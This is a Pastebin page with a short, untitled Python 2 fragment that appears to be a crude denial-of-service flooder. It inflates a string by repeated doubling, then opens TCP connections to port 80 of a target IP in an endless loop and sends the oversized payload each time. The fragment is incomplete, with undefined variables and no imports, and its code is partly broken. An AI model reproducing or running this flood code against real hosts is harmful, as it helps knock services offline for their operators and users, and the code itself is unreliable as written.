Guest User

Untitled

a guest
Jan 19th, 2018
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.37 KB | None | 0 0
  1. a = "101101010100010101010001010101000101010100010101000011010101010100010101010100010101";
  2.  
  3. if proto.lower() == "tcp":
  4.     while True:
  5.         try:
  6.             a = a + a
  7.         except MemoryError:
  8.             a = a
  9.  
  10.         print a;
  11.            
  12.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
  13.         s.connect( (ip, 80) );
  14.         s.send(a);
Add Comment
Please, Sign In to add comment